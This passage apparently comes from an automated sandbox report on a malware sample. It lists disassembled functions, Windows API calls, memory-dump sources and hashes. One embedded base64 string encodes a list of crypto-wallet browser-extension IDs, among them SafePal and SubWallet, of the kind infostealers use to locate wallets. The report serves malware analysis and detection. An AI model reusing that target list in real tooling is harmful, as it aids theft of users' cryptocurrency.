Opcode Fuzzy Hash: c3ce5e13dbd9c4fc09936991601a3094dc3c465b1d71001aaca5cc44e32a1ba1
Instruction Fuzzy Hash: 1E011275A40308BBDB10DFD4DD45F9D77B8EB44704F104558FB05BB2C0DAB4AA008B65

Function 00938EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00925184,40000001,00000000,00000000,?,00925184), ref: 00938EC0

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 39bb69c7bbc397994ad1aafd71895466e35c5cd5b44384d44e9f2ec621e2e602
Instruction ID: 80bf59081b8d17a787c4ceb2f882bfcb871693ae446efc73ebb614194d214e82
Opcode Fuzzy Hash: 39bb69c7bbc397994ad1aafd71895466e35c5cd5b44384d44e9f2ec621e2e602
Instruction Fuzzy Hash: 8011D674200309BFDF00DF64D885FAB37A9AF89714F109958F9198B250DB79E941DFA1

Function 00929AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00924EEE,00000000,?), ref: 00929B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929B2A
LocalFree.KERNEL32(?,?,?,?,00924EEE,00000000,?), ref: 00929B3F

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 4cf49d0f2dfa1925f0e4515c611895390a5de99a06f6ef309a31c2c86b46a27f
Instruction ID: 658c73cf56a563b059231f309f4c0fdce8f91ef006132c394cbf7e7b2cc4816b
Opcode Fuzzy Hash: 4cf49d0f2dfa1925f0e4515c611895390a5de99a06f6ef309a31c2c86b46a27f
Instruction Fuzzy Hash: 4E11A4B4240208AFEB10CF64DC95FAA77B9FB89700F208058F9159B3D4C7B5A901DB90

Function 00937980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00940E00,00000000,?), ref: 009379B0
RtlAllocateHeap.NTDLL(00000000), ref: 009379B7
GetLocalTime.KERNEL32(?,?,?,?,?,00940E00,00000000,?), ref: 009379C4
wsprintfA.USER32 ref: 009379F3

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: bc88e795b2d6a2e3360ab8652c2fa35aebd207e6b4ce16715515a0ec90cead00
Instruction ID: 0a72bd6f87059165859a2f80ee4ac132ba533e38eb10f3fd2553ed7497f46e9b
Opcode Fuzzy Hash: bc88e795b2d6a2e3360ab8652c2fa35aebd207e6b4ce16715515a0ec90cead00
Instruction Fuzzy Hash: C811E5B2904118AACB149FD9DD45BBEB7F8EB48B11F10465AF605A3280E67D5940CBB1

Function 6C6B85F0 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6B8C7C
__aulldiv.LIBCMT ref: 6C6B8DD7

Strings

cGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnB, xrefs: 6C6B8790, 6C6B8A47

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv
String ID: cGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnB
API String ID: 3732870572-4201613493
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 814de8cf06003e87ebb2477e944c0d94209f8b6e29ef4fbe5db3ef8435c7af2b
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: D5328F71F0011A8BDF18CE9CC8A17AEB7B2FB8C304F15853AD506BB7A0DA349D558B95

Function 6C696CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C696D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C696E1E

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: ba068df2cbb1ff551d94e21bc760f8014598e75bcf2a8839709e9f76211d8ed1
Instruction ID: cef72b3a95c0d67210e09b72d9d8342b2118f061bfe39851605f90312853d60d
Opcode Fuzzy Hash: ba068df2cbb1ff551d94e21bc760f8014598e75bcf2a8839709e9f76211d8ed1
Instruction Fuzzy Hash: 2BA17E706183818FC755CF25C490BAEFBE2BF89308F44495DE48A87751DB70E949CB96

Function 00933720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0093E118,00000000,00000001,0093E108,00000000), ref: 00933758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009337B0

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 8079d0d527583c771c87b00288c82929b4e212e162e1b858fd5951af01c45f40
Instruction ID: 35ae0bdf59a54a81c5c5b65fd114db1b9f6f3f535c3f3715c9062412727f3bd5
Opcode Fuzzy Hash: 8079d0d527583c771c87b00288c82929b4e212e162e1b858fd5951af01c45f40
Instruction Fuzzy Hash: C341C771A40A289FDB24DB58CC95F9BB7B5BB48702F4081D8E609A72D0D7B16E85CF50

Function 00CE77F7 Relevance: 2.8, Strings: 1, Instructions: 1552COMMON

Download Yara Rule

Strings

(^, xrefs: 00CE8098

Memory Dump Source

Source File: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID:
String ID: (^
API String ID: 0-598538182
Opcode ID: 74a8b80e721620388a18b0774ba78166a97b2a5524ba5f5642851637d17b5d17
Instruction ID: c6830f791750b9e71b405f646d371f668da4417ac25f38bda6d2470e21f86e5f
Opcode Fuzzy Hash: 74a8b80e721620388a18b0774ba78166a97b2a5524ba5f5642851637d17b5d17
Instruction Fuzzy Hash: 35B2C4B360C204AFE3046E2DEC8567AFBE9EF94720F16493DEAC4C3744E63598158697

Function 00C30C00 Relevance: 2.7, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

T}n, xrefs: 00C30C74
`hu, xrefs: 00C30C8B

Memory Dump Source

Source File: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID:
String ID: T}n$`hu
API String ID: 0-619579495
Opcode ID: 17b41e57310d5641e88dd8f8752d5a2ca2c2661f1d025025175939ef4695dbc9
Instruction ID: 9d898e8ebf525b9299c781cac789e2a95d87ad277209531764d0761330573a8e
Opcode Fuzzy Hash: 17b41e57310d5641e88dd8f8752d5a2ca2c2661f1d025025175939ef4695dbc9
Instruction Fuzzy Hash: A7513AF7A182005FE344AE2DED4576AB7EADBD8360F2A853DF6C4C3344E93588058692

Function 6C695C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C664A63,?,?), ref: 6C695F06

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 1913865122f404812779f936fc1b3168496d64710720d4fcf55dc420e8726b74
Instruction ID: 4e78ddb84189f0b869c18d016eff578674f1ff09ffa21a39c9186e2f069ba6a1
Opcode Fuzzy Hash: 1913865122f404812779f936fc1b3168496d64710720d4fcf55dc420e8726b74
Instruction Fuzzy Hash: 5FC1C275D0120A8BCB04CFA5D5906EEBBF2FF8A319F28425DD8556BB44D732A806CF94

Function 00C54292 Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

GO! , xrefs: 00C54360

Memory Dump Source

Source File: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
